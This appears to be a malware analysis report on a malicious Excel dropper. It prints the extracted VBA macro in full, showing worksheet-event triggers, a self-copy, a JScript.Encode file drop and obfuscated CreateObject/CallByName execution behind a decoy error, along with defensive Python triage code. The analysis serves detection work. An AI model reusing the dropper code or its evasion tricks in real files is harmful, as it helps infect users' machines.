Xls.Dropper.Generic-9765465-0 — Office (OOXML) malware analysis

Static analysis result for SHA-256 15b18423900b283b…

Verdict: MALICIOUS

File type: Office (OOXML)

Size: 599.6 KB · Created: 2006-09-16 00:00:00 UTC · Authoring application: Microsoft Excel 16.0300 · First seen: 2020-07-24
MD5: f8204f2ca4f4cb00f306c06d571acb15 · SHA-1: 76821f2608749556fad6922aae08bb558ad8338f · SHA-256: 15b18423900b283b1c89efcae0652761bcde40dfb45118c3fd9b4f4659701d56
Risk score: 230

Malware Insights

Xls.Dropper.Generic-9765465-0 · confidence 90%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic · T1204.002 User Execution: Malicious File

ClamAV identifies the sample as malicious with the signature Xls.Dropper.Generic-9765465-0. The extracted VBA (Sheet1 module) is a two-stage dropper. Its triggers are the worksheet events Worksheet_Calculate and Worksheet_PivotTableUpdate rather than Workbook_Open or Auto_Open, so a sandbox or scanner that only exercises the document-open entry points may never see it run. The trigger routine (Bei_yhu) creates a Pray2 directory one level above Excel's StartupPath, saves a copy of the workbook there as Note101.xlsm or Note102.xlsm, opens the copy and calls one of two routines in it through Application.Run, selected by a flag kept in UserForm1.Label1.Caption: DOlrf writes the contents of UserForm1.Doner.Value to FORT.jse in the workbook's directory, and PO_NOx rebuilds the same path from split literals ("\FORT" & "" & ".j" & "" & "s" & "e") and passes it, wrapped in double quotes, to CallByName on an object returned by CreateObject. The .jse extension is JScript.Encode, a script format run by the Windows Script Host, which is why the sample is classified as a dropper for a second-stage script. The ProgID handed to CreateObject and the method name handed to CallByName are both read from UserForm1 control captions (xx0, xx1, Film) that live in the form's binary storage, not in the extracted VBA text, so the exact execution primitive cannot be confirmed from this listing. The MsgBox text "The file is corrupted and cannot be opened" is a decoy shown after the call, and the benign helper subs (CustomHeader, HighlightDuplicateValues) with their copied tutorial comments are filler around the real code; MIObj even buries the CreateObject call inside a cell-colouring loop. One metadata caveat: the Created timestamp (2006-09-16) predates the authoring application recorded in the file (Excel 16.x, i.e. Office 2016 or later), so the creation date is not reliable.

Heuristics (6)

  • ClamAV: Xls.Dropper.Generic-9765465-0 · critical · CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Generic-9765465-0
  • VBA project inside OOXML · medium · 2 related findings · OOXML_VBA
    Document contains a VBA project (xl/vbaProject.bin); VBA macros present
  • CreateObject call · high · OLE_VBA_CREATEOBJ
    CreateObject instantiates a COM object from a ProgID string. Here the ProgID is built at run time from two UserForm1 captions with spaces stripped (MIObj), so the target class does not appear in the macro text.
  • CallByName call · high · OLE_VBA_CALLBYNAME
    CallByName invokes a method whose name is passed as a string (UserForm1.Film.Caption in PO_NOx), so the call does not show up in a search for known method names.
  • External hyperlinks (4) · low · OOXML_EXTERNAL_HYPERLINKS
    Document contains 4 external hyperlinks; clickable URLs are stored as external relationships (TargetMode="External" in the part's .rels). First target: https://www.quora.com/profile/Alok-Jha-43
  • Embedded URL · info · EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs beginning http://schemas. are normally OOXML and Office namespace identifiers rather than network destinations.
    • http://schemas.micr (truncated in this report) · in document text (OOXML body / shared strings)
    • http://schemas (truncated in this report) · in document text (OOXML body / shared strings)
    • https://www.quora.com/profile/Alok-Jha-43 · document hyperlink
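The OOXML_VBA and OOXML_EXTERNAL_HYPERLINKS findings above come from nothing more than walking the zip container. The following example, added to this page and not part of the analysis service's tooling, shows that triage step in Python: it checks for a vbaProject.bin part, lists media parts, and pulls every relationship whose TargetMode is "External" out of the .rels parts. Because the real sample is not reproduced here, build_stand_in_xlsm() constructs a minimal stand-in zip with the part names and the one hyperlink target the report lists; the function names are the example's own.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"


def build_stand_in_xlsm() -> bytes:
    """Constructed stand-in for the sample: a minimal OOXML zip with the parts
    the report lists (xl/vbaProject.bin, xl/media/image1.emf) and one external
    hyperlink relationship. It is not the real file and carries no payload."""
    rels = (
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%shyperlink" '
        'Target="https://www.quora.com/profile/Alok-Jha-43" TargetMode="External"/>'
        '<Relationship Id="rId2" Type="%sdrawing" Target="../drawings/drawing1.xml"/>'
        "</Relationships>"
    ) % (REL_NS, OFFICE_REL, OFFICE_REL)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        # Real vbaProject.bin parts are OLE compound files (D0 CF 11 E0 magic).
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0 placeholder")
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels)
        z.writestr("xl/media/image1.emf", b"\x01\x00\x00\x00 EMF placeholder")
    return buf.getvalue()


def triage_ooxml(data: bytes) -> dict:
    """Walk the zip without rendering anything: record the VBA project part,
    list media parts, and collect every relationship that points outside the
    package (hyperlinks, but also oleObject/externalLink/template targets)."""
    findings = {"vba_project": None, "media_parts": [], "external": []}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            low = name.lower()
            if low.endswith("vbaproject.bin"):
                findings["vba_project"] = name
            elif low.startswith("xl/media/"):
                findings["media_parts"].append(name)
            elif low.endswith(".rels"):
                root = ET.fromstring(z.read(name))
                for rel in root.iter("{%s}Relationship" % REL_NS):
                    if rel.get("TargetMode") != "External":
                        continue
                    kind = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings["external"].append((name, kind, rel.get("Target")))
    return findings


if __name__ == "__main__":
    print(triage_ooxml(build_stand_in_xlsm()))
```

To run it against a real file, replace build_stand_in_xlsm() with the bytes of the .xlsm. Collecting all external relationships rather than only hyperlink ones matters because remote-template and external-link tricks use the same TargetMode="External" mechanism in other .rels parts.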

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename · Kind · Source · Size
macros.bas · vba-macro · oletools.olevba.extract_macros (decoded VBA source from OOXML) · 4538 bytes
SHA-256: 81c5d81e4281db8b8b5d5ad38e9ebf7df1152976cfba7c046c230e77581622d2
Preview: first 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'14. Highlight Named Ranges
'
'If you are not sure about how many named ranges you have in your worksheet then you can use this code to highlight all of them.
'

Sub CustomHeader()
Dim myText As String
myText = InputBox("Enter your text here", "Enter Text")
With ActiveSheet.PageSetup
.LeftHeader = ""
.CenterHeader = myText
.RightHeader = ""
.LeftFooter = ""
.CenterFooter = ""
.RightFooter = ""
End With
End Sub


Sub HighlightDuplicateValues()
Dim myRange As Range
Dim myCell As Range
Set myRange = Selection
For Each myCell In myRange
If WorksheetFunction.CountIf(myRange, myCell.Value) > 1 Then
myCell.Interior.ColorIndex = 36
End If
Next myCell
End Sub

Sub highlightCommentCells(se As String)
Selection.SpecialCells(xlCellTypeComments).Select
Selection.Style = se
End Sub

Private Function MIObj() As Object
Dim Rng As Range
Dim x As Range
Set x = Worksheets("Sheet1").Cells
For Each Rng In Selection
If WorksheetFunction.IsNumber(Rng) Then
If Rng.Value < 0 Then
Rng.Font.Color = -16776961

End If
End If
Set MIObj = CreateObject(Replace(UserForm1.xx0.Caption & UserForm1.xx1.Caption, " ", ""))
Next
End Function


Private Sub PO_NOx()
Dim DbNop As String
Dim BTgol As String
BTgol = """"
'highlightCommentCells BTgol
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Debug.Print "Finish"
MsgBox Application.Path & Chr(13) & Chr(10) & ": The file is corrupted and cannot be opened " & CallByName(MIObj, UserForm1.Film.Caption, 1, BTgol & DbNop & BTgol, 1)
HighlightDuplicateValues
ActiveWorkbook.Close SaveChanges:=True
End Sub

Private Sub DOlrf()
Debug.Print "drswe"
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Debug.Print "hyij"
Open DbNop For Output As #1
Debug.Print "rtf ijuo"
Print #1, UserForm1.Doner.Value
Debug.Print "Kol 7yh7"
Close #1
End Sub



Sub Bei_yhu(FInrtg As Byte)
Dim SA As Workbook
Debug.Print "esdruyg"
    awse = ActiveWorkbook.Application.StartupPath & "\..\Pray2"
    'ActiveWorkbook.Ap
    On Error Resume Next
    MkDir awse
    NRople = awse & "\Note" & FInrtg & ".xlsm"
    Application.DisplayAlerts = False
    ActiveWorkbook.SaveCopyAs NRople
    Subrt2 = "DOlrf"
    Debug.Print "esdruyg"
    Jolp = "PO_NOx"
    Set SA = Workbooks.Open(NRople)
    If UserForm1.Label1.Caption = "Solt" Then
    UserForm1.Label1.Caption = "seaq gytugty"
    'first
    SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Subrt2
    Else
    'second
    SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Jolp
    End If
    Set SA = Nothing
    Debug.Print "Kol 7yh7"
   
End Sub




Private Sub Worksheet_PivotTableUpdate(ByVal Target As PivotTable)
'runs
Bei_yhu 102
End Sub



Private Sub Worksheet_Calculate()
'mer
Bei_yhu 101
End Sub





Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{75B6774F-339A-4ADB-B614-4A5ACC9DED60}{DD47C5FB-8B24-4F24-99DA-844CDEFF4F86}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()
Debug.Print "Change"
End Sub

Private Sub Label3_Click()

End Sub

Private Sub ComboBox1_Change()

End Sub

Private Sub RefEdit1_BeforeDragOver(Cancel As Boolean, ByVal Data As MSForms.DataObject, ByVal x As stdole.OLE_XPOS_CONTAINER, ByVal y As stdole.OLE_YPOS_CONTAINER, By
... (truncated)
vbaProject_00.bin · vba-project · OOXML VBA project: xl/vbaProject.bin · 686080 bytes
SHA-256: d3e7eb1932d0840d9a80c15f619c72e2f05a0c71716d0ba74b9be0610299b97b
Detection: ClamAV: Xls.Dropper.Generic-9765465-0
Obfuscation or payload: unlikely
The decoded macro source is only 4538 bytes, so most of this 686 KB part is something other than code; the UserForm1 storage, which holds the Doner.Value text that DOlrf writes to FORT.jse and the captions that MIObj and PO_NOx read, is the obvious place to look next.
emf_00.emf · ooxml-emf · OOXML EMF part: xl/media/image1.emf · 1842004 bytes
SHA-256: 0295c5e4bea86a8a79ab50edfaa4d774e2d02df6ff818f54392499799e047686
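To make the reconstruction in the Malware Insights section repeatable, the following example, written for this page (it is neither the analysis service's tooling nor the malware's code), folds VBA string concatenation, substitutes earlier assignments, and tallies the suspicious calls, event-handler triggers and UserForm1 references. The MACRO_EXCERPT constant is copied from the macros.bas listing above, trimmed to the lines that build paths, write the file or invoke something; the function and variable names are the example's own.

```python
import re

# Trimmed copy of the Sheet1 module from the macros.bas listing above.
MACRO_EXCERPT = r'''
Private Function MIObj() As Object
Set MIObj = CreateObject(Replace(UserForm1.xx0.Caption & UserForm1.xx1.Caption, " ", ""))
End Function
Private Sub PO_NOx()
BTgol = """"
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
MsgBox Application.Path & Chr(13) & Chr(10) & ": The file is corrupted and cannot be opened " & CallByName(MIObj, UserForm1.Film.Caption, 1, BTgol & DbNop & BTgol, 1)
End Sub
Private Sub DOlrf()
DbNop = ActiveWorkbook.Path & "\FORT" & "" & ".j" & "" & "s" & "e"
Open DbNop For Output As #1
Print #1, UserForm1.Doner.Value
Close #1
End Sub
Sub Bei_yhu(FInrtg As Byte)
    awse = ActiveWorkbook.Application.StartupPath & "\..\Pray2"
    NRople = awse & "\Note" & FInrtg & ".xlsm"
    ActiveWorkbook.SaveCopyAs NRople
    Subrt2 = "DOlrf"
    SA.Application.Run "'" & SA.FullName & "'!Sheet1." & Subrt2
End Sub
Private Sub Worksheet_PivotTableUpdate(ByVal Target As PivotTable)
Bei_yhu 102
End Sub
Private Sub Worksheet_Calculate()
Bei_yhu 101
End Sub
'''

ASSIGN = re.compile(r'^\s*([A-Za-z_]\w*)\s*=\s*(.+?)\s*$')
EVENT = re.compile(
    r'^\s*(?:Private\s+)?Sub\s+(\w+_(?:Calculate|PivotTableUpdate|Open|Activate|'
    r'Change|SelectionChange|BeforeClose))\b', re.M)
SUSPICIOUS = ('CreateObject', 'CallByName', 'Application.Run', 'SaveCopyAs',
              'For Output', 'Print #')


def split_concat(expr):
    """Split a VBA expression on '&' outside string literals (does not descend
    into call arguments, so only plain assignments are folded)."""
    parts, cur, in_str = [], [], False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        if ch == '&' and not in_str:
            parts.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append(''.join(cur).strip())
    return parts


def fold_concat(expr, env):
    """Return [(kind, value)] with adjacent literals merged, empty "" padding
    dropped and variables already recorded in env substituted in place."""
    out = []

    def push(kind, value):
        if kind == 'lit':
            if not value:
                return
            if out and out[-1][0] == 'lit':
                out[-1] = ('lit', out[-1][1] + value)
                return
        out.append((kind, value))

    for p in split_concat(expr):
        if len(p) >= 2 and p[0] == '"' and p[-1] == '"':
            push('lit', p[1:-1].replace('""', '"'))   # VBA escapes " as ""
        elif p in env:
            for kind, value in env[p]:
                push(kind, value)
        else:
            push('sym', p)
    return out


def render(parts):
    return ' & '.join('"%s"' % v.replace('"', '""') if k == 'lit' else v
                      for k, v in parts)


def analyse_vba(src):
    env, report = {}, {'assignments': {}, 'calls': {}}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if m and '"' in m.group(2):
            parts = fold_concat(m.group(2), env)
            env[m.group(1)] = parts
            report['assignments'][m.group(1)] = render(parts)
        for needle in SUSPICIOUS:
            if needle in line:
                report['calls'][needle] = report['calls'].get(needle, 0) + 1
    report['event_handlers'] = EVENT.findall(src)
    report['userform_refs'] = sorted(set(re.findall(r'UserForm1\.\w+\.\w+', src)))
    return report
```

On the excerpt, DbNop folds to ActiveWorkbook.Path & "\FORT.jse" and NRople to ActiveWorkbook.Application.StartupPath & "\..\Pray2\Note" & FInrtg & ".xlsm", which is the drop location described above. The userform_refs entry is the list of values the macro reads from UserForm1 (Doner.Value, Film.Caption, xx0.Caption, xx1.Caption); those are not in the VBA text and have to be recovered from the form's storage inside vbaProject.bin.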